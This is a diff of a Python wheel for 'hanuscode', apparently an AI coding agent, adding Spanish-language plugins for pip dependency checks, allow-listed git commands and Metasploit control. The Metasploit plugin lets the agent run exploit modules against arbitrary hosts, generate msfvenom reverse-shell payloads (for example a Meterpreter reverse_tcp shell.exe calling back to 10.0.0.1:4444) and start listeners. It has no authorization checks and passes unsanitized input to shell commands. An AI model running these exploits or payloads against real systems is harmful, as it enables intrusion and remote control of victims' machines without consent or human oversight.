hanuscode 1.0.0__py3-none-any.whl

hanus/plugins/deps_check.py

@@ -0,0 +1,27 @@
+# plugins/deps_check.py — Análisis de dependencias
+import subprocess
+
+NAME        = "deps_check"
+DESCRIPTION = "Analiza dependencias Python: lista, desactualizadas, árbol"
+USAGE       = "list | outdated | tree"
+AGENT_DOC   = """
+- <run_plugin name="deps_check" args="list"/>      Lista todos los paquetes
+- <run_plugin name="deps_check" args="outdated"/>  Paquetes desactualizados
+- <run_plugin name="deps_check" args="tree"/>      Árbol de dependencias (requiere pipdeptree)
+"""
+
+def run(args: str = "") -> str:
+    cmd = args.strip().lower() or "list"
+    if cmd == "list":     return _run_pip(["pip","list","--format=columns"])
+    if cmd == "outdated": return _run_pip(["pip","list","--outdated","--format=columns"])
+    if cmd == "tree":
+        out = _run_pip(["pipdeptree","--warn","silence"])
+        return out if "not found" not in out.lower() else "Instala pipdeptree: pip install pipdeptree\n\n" + _run_pip(["pip","list","--format=columns"])
+    return f"Comando '{cmd}' no reconocido. Usa: list, outdated, tree"
+
+def _run_pip(command: list) -> str:
+    try:
+        r = subprocess.run(command, capture_output=True, text=True, timeout=30)
+        return (r.stdout or r.stderr).strip() or "Sin salida."
+    except FileNotFoundError: return f"Comando no encontrado: {command[0]}"
+    except Exception as e:    return f"Error: {e}"

hanus/plugins/git_ops.py

@@ -0,0 +1,33 @@
+# plugins/git_ops.py — Operaciones Git avanzadas
+import subprocess, shlex
+from pathlib import Path
+
+NAME        = "git_ops"
+DESCRIPTION = "Operaciones git: log, branch, stash, show, describe, remote"
+USAGE       = "log|branch|stash|show|remote [parámetros]"
+AGENT_DOC   = """
+Ejemplos:
+- <run_plugin name="git_ops" args="log --oneline -10"/>
+- <run_plugin name="git_ops" args="branch -a"/>
+- <run_plugin name="git_ops" args="stash list"/>
+- <run_plugin name="git_ops" args="show HEAD"/>
+- <run_plugin name="git_ops" args="remote -v"/>
+"""
+SAFE = {"log","branch","stash","show","describe","tag","shortlog","reflog","remote","fetch","cherry"}
+
+def run(args: str = "") -> str:
+    if not args.strip():
+        return "Indica subcomando: log, branch, stash, show, remote, fetch…"
+    parts  = shlex.split(args)
+    subcmd = parts[0].lower() if parts else ""
+    if subcmd not in SAFE:
+        return f"'{subcmd}' no permitido por seguridad. Usa exec_cmd para operaciones destructivas."
+    try:
+        r = subprocess.run(["git"]+parts, cwd=Path(".").resolve(),
+                           capture_output=True, text=True, timeout=15)
+        out = r.stdout.strip(); err = r.stderr.strip()
+        return (f"[git {subcmd}] Error:\n{err or out}" if r.returncode != 0
+                else out or f"[git {subcmd}] OK (sin salida)")
+    except FileNotFoundError: return "git no encontrado en el PATH."
+    except subprocess.TimeoutExpired: return "Timeout ejecutando git."
+    except Exception as e: return f"Error: {e}"

hanus/plugins/metasploit.py

@@ -0,0 +1,530 @@
+# plugins/metasploit.py — Metasploit Framework Integration
+"""
+Plugin para interactuar con Metasploit Framework.
+Permite ejecutar módulos, generar payloads, gestionar sesiones, etc.
+
+Uso:
+  /metasploit search <módulo>          — Buscar módulos
+  /metasploit info <módulo>            — Info de un módulo
+  /metasploit run <módulo> [opts]      — Ejecutar módulo
+  /metasploit payload <opts>           — Generar payload con msfvenom
+  /metasploit sessions                 — Listar sesiones activas
+  /metasploit handler [opts]           — Iniciar handler multi/handler
+"""
+from __future__ import annotations
+import subprocess
+import shlex
+import re
+import os
+import tempfile
+from pathlib import Path
+from typing import List, Dict, Optional, Tuple
+
+NAME        = "metasploit"
+DESCRIPTION = "Control de Metasploit Framework: módulos, payloads, sesiones"
+USAGE       = "<comando> [args...] | search <term> | info <module> | payload <opts>"
+AGENT_DOC   = """
+Plugin para controlar Metasploit Framework.
+
+Comandos disponibles:
+- search <término>           — Buscar módulos en Metasploit
+- info <módulo>              — Ver información detallada de un módulo
+- run <módulo> [opciones]    — Ejecutar un módulo con opciones
+- payload <opciones>         — Generar payload con msfvenom
+- handler [LPORT]            — Iniciar multi/handler
+- sessions                   — Listar sesiones activas
+- connect <host> <port>      — Conectar a un servicio
+- db_status                  — Estado de la base de datos
+
+Ejemplos:
+<run_plugin name="metasploit" args="search apache"/>
+<run_plugin name="metasploit" args="info exploit/multi/http/apache_mod_cgi_bash_env_exec"/>
+<run_plugin name="metasploit" args="payload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe -o shell.exe"/>
+<run_plugin name="metasploit" args="handler 4444"/>
+"""
+
+
+def _run_cmd(cmd: str, timeout: int = 120) -> Tuple[int, str, str]:
+    """Ejecuta un comando y retorna (returncode, stdout, stderr)."""
+    try:
+        result = subprocess.run(
+            cmd,
+            shell=True,
+            capture_output=True,
+            text=True,
+            timeout=timeout
+        )
+        return result.returncode, result.stdout, result.stderr
+    except subprocess.TimeoutExpired:
+        return -1, "", "Timeout expirado"
+    except Exception as e:
+        return -1, "", str(e)
+
+
+def _run_msf_rc(commands: List[str], timeout: int = 300) -> Tuple[int, str, str]:
+    """Ejecuta comandos MSF desde un archivo RC temporal."""
+    with tempfile.NamedTemporaryFile(mode='w', suffix='.rc', delete=False) as f:
+        for cmd in commands:
+            f.write(cmd + '\n')
+        rc_file = f.name
+
+    try:
+        result = subprocess.run(
+            f"msfconsole -q -r {shlex.quote(rc_file)}",
+            shell=True,
+            capture_output=True,
+            text=True,
+            timeout=timeout
+        )
+        return result.returncode, result.stdout, result.stderr
+    except subprocess.TimeoutExpired:
+        return -1, "", "Timeout expirado"
+    finally:
+        os.unlink(rc_file)
+
+
+def _search_module(term: str) -> str:
+    """Busca módulos en Metasploit."""
+    # Usar msfconsole en modo batch para búsqueda
+    commands = [f"search {term}", "exit -y"]
+    retcode, stdout, stderr = _run_msf_rc(commands, timeout=60)
+
+    if not stdout.strip():
+        return f"No se encontraron módulos para: {term}"
+
+    # Parsear resultados
+    lines = stdout.strip().split('\n')
+    modules = []
+    in_results = False
+
+    for line in lines:
+        # Detectar inicio de resultados
+        if 'Matching Modules' in line or '----' in line:
+            in_results = True
+            continue
+
+        if not in_results:
+            continue
+
+        # Saltar líneas vacías o de separación
+        if not line.strip() or line.startswith('==='):
+            continue
+
+        # Parsear línea de módulo
+        # Formato: exploit/multi/http/xxx  2014-xx-xx  excellent  Apache xxx
+        parts = line.split()
+        if len(parts) >= 2 and '/' in parts[0]:
+            module_path = parts[0]
+            disclosure = parts[1] if len(parts) > 1 else ""
+            rank = parts[2] if len(parts) > 2 else ""
+            name = ' '.join(parts[3:]) if len(parts) > 3 else ""
+            modules.append({
+                'path': module_path,
+                'disclosure': disclosure,
+                'rank': rank,
+                'name': name
+            })
+
+    if not modules:
+        # Devolver salida original si no se pudo parsear
+        return stdout
+
+    output = [f"Módulos encontrados para '{term}': {len(modules)} resultados", "━" * 70]
+
+    for m in modules[:30]:  # Limitar a 30 resultados
+        output.append(f"  [{m['rank']:<10}] {m['path']}")
+        if m['name']:
+            output.append(f"              {m['name'][:60]}")
+
+    if len(modules) > 30:
+        output.append(f"\n  ... y {len(modules) - 30} más")
+
+    output.append(f"\nPara ver detalles: metasploit info <módulo>")
+
+    return "\n".join(output)
+
+
+def _module_info(module_path: str) -> str:
+    """Obtiene información de un módulo."""
+    commands = [f"info {module_path}", "exit -y"]
+    retcode, stdout, stderr = _run_msf_rc(commands, timeout=60)
+
+    if not stdout.strip():
+        return f"No se encontró el módulo: {module_path}"
+
+    # La salida ya está bien formateada por msfconsole
+    # Solo limpiar algunas líneas innecesarias
+    lines = stdout.strip().split('\n')
+    output_lines = []
+    skip_empty = False
+
+    for line in lines:
+        # Saltar líneas de metadatos del framework
+        if 'metasploit framework' in line.lower():
+            continue
+        if line.strip() == '' and skip_empty:
+            continue
+        output_lines.append(line)
+        skip_empty = line.strip() == ''
+
+    return "\n".join(output_lines)
+
+
+def _run_module(module_path: str, options: Dict[str, str]) -> str:
+    """Ejecuta un módulo con opciones."""
+    commands = [
+        f"use {module_path}",
+    ]
+
+    # Configurar opciones
+    for key, value in options.items():
+        commands.append(f"set {key} {value}")
+
+    # Ver configuración
+    commands.append("show options")
+
+    # Ejecutar
+    commands.append("run -z")  # -z para no interactivo
+    commands.append("exit -y")
+
+    retcode, stdout, stderr = _run_msf_rc(commands, timeout=300)
+
+    if not stdout.strip():
+        return f"Error ejecutando módulo: {stderr}"
+
+    return stdout
+
+
+def _generate_payload(payload_type: str, options: Dict[str, str],
+                      format_type: str = "exe", output_file: str = None) -> str:
+    """Genera un payload con msfvenom."""
+    cmd_parts = ["msfvenom", "-p", payload_type]
+
+    # Añadir opciones del payload
+    for key, value in options.items():
+        cmd_parts.append(f"{key}={value}")
+
+    # Formato de salida
+    if format_type:
+        cmd_parts.extend(["-f", format_type])
+
+    # Archivo de salida
+    if output_file:
+        cmd_parts.extend(["-o", output_file])
+
+    cmd = " ".join(shlex.quote(p) if " " in p else p for p in cmd_parts)
+
+    retcode, stdout, stderr = _run_cmd(cmd, timeout=120)
+
+    if retcode != 0 and stderr:
+        # Verificar si es solo warning
+        if "Warning" in stderr and stdout:
+            pass  # Continuar con el output
+        else:
+            return f"Error generando payload:\n{stderr}"
+
+    output = [f"Payload generado: {payload_type}", "━" * 60]
+
+    if output_file and Path(output_file).exists():
+        size = Path(output_file).stat().st_size
+        output.append(f"Archivo: {output_file} ({size:,} bytes)")
+        output.append(f"Formato: {format_type}")
+    else:
+        output.append("Payload (hex/base64):")
+        output.append(stdout[:500] if len(stdout) > 500 else stdout)
+
+    # Mostrar comando para handler
+    lhost = options.get('LHOST', 'TU_IP')
+    lport = options.get('LPORT', '4444')
+    output.append(f"\nPara recibir conexión, ejecuta:")
+    output.append(f"  metasploit handler {lport}")
+    output.append(f"\nO en msfconsole:")
+    output.append(f"  use exploit/multi/handler")
+    output.append(f"  set PAYLOAD {payload_type}")
+    output.append(f"  set LHOST {lhost}")
+    output.append(f"  set LPORT {lport}")
+    output.append(f"  run")
+
+    return "\n".join(output)
+
+
+def _start_handler(lport: str = "4444", payload: str = None, lhost: str = "0.0.0.0") -> str:
+    """Inicia un handler multi/handler."""
+    if not payload:
+        payload = "windows/meterpreter/reverse_tcp"
+
+    # Crear archivo RC para handler persistente
+    handler_rc = f"""use exploit/multi/handler
+set PAYLOAD {payload}
+set LHOST {lhost}
+set LPORT {lport}
+set ExitOnSession false
+run -j
+"""
+
+    # Guardar en directorio del usuario
+    hanus_dir = Path.home() / ".hanus"
+    hanus_dir.mkdir(exist_ok=True)
+    rc_file = hanus_dir / "handler.rc"
+    rc_file.write_text(handler_rc)
+
+    output = [
+        f"Handler configurado en puerto {lport}",
+        "━" * 60,
+        f"Payload: {payload}",
+        f"LHOST: {lhost}",
+        f"LPORT: {lport}",
+        "",
+        "Archivo RC creado:",
+        f"  {rc_file}",
+        "",
+        "Para iniciar el handler:",
+        f"  msfconsole -q -r {rc_file}",
+        "",
+        "O ejecuta en una terminal aparte:",
+        f"  msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD {payload}; set LHOST {lhost}; set LPORT {lport}; run'"
+    ]
+
+    return "\n".join(output)
+
+
+def _list_sessions() -> str:
+    """Lista sesiones activas de Metasploit."""
+    commands = ["sessions -l", "exit -y"]
+    retcode, stdout, stderr = _run_msf_rc(commands, timeout=30)
+
+    if not stdout.strip():
+        return "No hay sesiones activas o msfrpcd no está corriendo."
+
+    # Buscar patrón de sesiones
+    if "No active sessions" in stdout:
+        return "No hay sesiones activas."
+
+    return stdout
+
+
+def _connect_service(host: str, port: str) -> str:
+    """Conecta a un servicio y ejecuta comandos básicos de enumeración."""
+    commands = [
+        f"connect {host} {port}",
+        "exit -y"
+    ]
+    retcode, stdout, stderr = _run_msf_rc(commands, timeout=30)
+
+    if not stdout.strip():
+        return f"Error conectando a {host}:{port}"
+
+    return stdout
+
+
+def _db_status() -> str:
+    """Verifica el estado de la base de datos de Metasploit."""
+    commands = ["db_status", "exit -y"]
+    retcode, stdout, stderr = _run_msf_rc(commands, timeout=30)
+
+    if not stdout.strip():
+        return "No se pudo verificar el estado de la DB."
+
+    return stdout
+
+
+def _list_workspaces() -> str:
+    """Lista workspaces de la base de datos."""
+    commands = ["workspace", "exit -y"]
+    retcode, stdout, stderr = _run_msf_rc(commands, timeout=30)
+
+    return stdout if stdout.strip() else "No hay workspaces o DB no conectada."
+
+
+def _exploit_template(module_path: str) -> str:
+    """Genera una plantilla para usar un módulo de exploit."""
+    # Obtener info del módulo
+    commands = [f"info {module_path}", "exit -y"]
+    retcode, stdout, stderr = _run_msf_rc(commands, timeout=60)
+
+    # Parsear opciones requeridas
+    required_options = []
+    in_options = False
+
+    for line in stdout.split('\n'):
+        if 'Required Options' in line or 'Basic options' in line:
+            in_options = True
+            continue
+        if in_options:
+            if line.strip() == '' or line.startswith('==='):
+                break
+            # Parsear opción
+            parts = line.split()
+            if len(parts) >= 2:
+                opt_name = parts[0]
+                required = 'required' in line.lower() or '*' in line
+                if required and opt_name not in ['Name', 'Current', 'Required']:
+                    required_options.append(opt_name)
+
+    output = [
+        f"PLANTILLA PARA: {module_path}",
+        "━" * 60,
+        "",
+        "En msfconsole:",
+        f"  use {module_path}",
+    ]
+
+    for opt in required_options:
+        output.append(f"  set {opt} <VALOR>")
+
+    output.append("  run")
+    output.append("")
+    output.append("O usar plugin metasploit:")
+    output.append(f"  metasploit run {module_path} RHOSTS=<target> ...")
+
+    output.append("")
+    output.append("O como RC file:")
+    output.append(f"  use {module_path}")
+
+    for opt in required_options:
+        output.append(f"  set {opt} VALUE")
+
+    output.append("  run")
+
+    return "\n".join(output)
+
+
+def run(args: str = "") -> str:
+    """Punto de entrada del plugin."""
+    if not args.strip():
+        return f"Uso: {USAGE}\n\n{AGENT_DOC}"
+
+    parts = args.strip().split(maxsplit=2)
+    cmd = parts[0].lower()
+    cmd_args = parts[1:] if len(parts) > 1 else []
+
+    # ── SEARCH ────────────────────────────────────────────────────────────
+    if cmd == "search":
+        if not cmd_args:
+            return "Uso: search <término>"
+
+        term = " ".join(cmd_args)
+        return _search_module(term)
+
+    # ── INFO ───────────────────────────────────────────────────────────────
+    if cmd == "info":
+        if not cmd_args:
+            return "Uso: info <módulo>\nEjemplo: info exploit/multi/http/apache_mod_cgi_bash_env_exec"
+
+        module_path = cmd_args[0]
+        return _module_info(module_path)
+
+    # ── RUN ────────────────────────────────────────────────────────────────
+    if cmd == "run":
+        if not cmd_args:
+            return "Uso: run <módulo> [OPCIONES...]\nEjemplo: run exploit/multi/http/test RHOSTS=192.168.1.1"
+
+        module_path = cmd_args[0]
+        options = {}
+
+        for arg in cmd_args[1:]:
+            if '=' in arg:
+                key, value = arg.split('=', 1)
+                options[key.strip()] = value.strip()
+
+        return _run_module(module_path, options)
+
+    # ── PAYLOAD ────────────────────────────────────────────────────────────
+    if cmd == "payload":
+        if not cmd_args:
+            return """Uso: payload <tipo> [opciones]
+
+Ejemplos:
+  payload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444
+  payload linux/x86/meterpreter/reverse_tcp LHOST=10.0.0.1 -f elf -o shell.elf
+  payload windows/meterpreter/reverse_https LHOST=10.0.0.1 LPORT=443 -f exe -o shell.exe
+
+Payloads comunes:
+  windows/meterpreter/reverse_tcp      — Windows Meterpreter TCP
+  windows/meterpreter/reverse_https    — Windows Meterpreter HTTPS
+  linux/x86/meterpreter/reverse_tcp    — Linux Meterpreter
+  php/meterpreter/reverse_tcp          — PHP Meterpreter
+  java/jsp_shell_reverse_tcp           — Java JSP Shell
+"""
+
+        payload_type = cmd_args[0]
+        options = {}
+        format_type = "exe"
+        output_file = None
+
+        for arg in cmd_args[1:]:
+            if arg.startswith('-f='):
+                format_type = arg[3:]
+            elif arg == '-f' and cmd_args.index(arg) + 1 < len(cmd_args):
+                format_type = cmd_args[cmd_args.index(arg) + 1]
+            elif arg.startswith('-o='):
+                output_file = arg[3:]
+            elif arg == '-o' and cmd_args.index(arg) + 1 < len(cmd_args):
+                output_file = cmd_args[cmd_args.index(arg) + 1]
+            elif '=' in arg:
+                key, value = arg.split('=', 1)
+                options[key.strip()] = value.strip()
+
+        return _generate_payload(payload_type, options, format_type, output_file)
+
+    # ── HANDLER ────────────────────────────────────────────────────────────
+    if cmd == "handler":
+        lport = cmd_args[0] if cmd_args else "4444"
+        payload = None
+
+        for arg in cmd_args[1:]:
+            if arg.startswith('PAYLOAD='):
+                payload = arg.split('=', 1)[1]
+
+        return _start_handler(lport, payload)
+
+    # ── SESSIONS ───────────────────────────────────────────────────────────
+    if cmd == "sessions":
+        return _list_sessions()
+
+    # ── CONNECT ─────────────────────────────────────────────────────────────
+    if cmd == "connect":
+        if len(cmd_args) < 2:
+            return "Uso: connect <host> <puerto>"
+
+        return _connect_service(cmd_args[0], cmd_args[1])
+
+    # ── DB ──────────────────────────────────────────────────────────────────
+    if cmd == "db":
+        return _db_status()
+
+    # ── WORKSPACE ───────────────────────────────────────────────────────────
+    if cmd == "workspace":
+        return _list_workspaces()
+
+    # ── TEMPLATE ────────────────────────────────────────────────────────────
+    if cmd == "template":
+        if not cmd_args:
+            return "Uso: template <módulo>"
+
+        return _exploit_template(cmd_args[0])
+
+    # ── HELP ────────────────────────────────────────────────────────────────
+    if cmd in ("help", "info"):
+        return f"""Metasploit Framework Control
+
+Comandos:
+  search <término>        Buscar módulos
+  info <módulo>           Ver información del módulo
+  run <módulo> [opts]     Ejecutar módulo
+  payload <tipo> [opts]   Generar payload con msfvenom
+  handler [puerto]        Configurar handler
+  sessions                Listar sesiones activas
+  connect <host> <port>   Conectar a servicio
+  db                      Estado de base de datos
+  workspace               Listar workspaces
+  template <módulo>       Generar plantilla de uso
+
+Ejemplos:
+  metasploit search apache
+  metasploit info exploit/multi/http/shellshock
+  metasploit payload windows/meterpreter/reverse_tcp LHOST=10.0.0.1
+  metasploit handler 4444
+"""
+
+    return f"Comando desconocido: {cmd}\nUsa: metasploit help"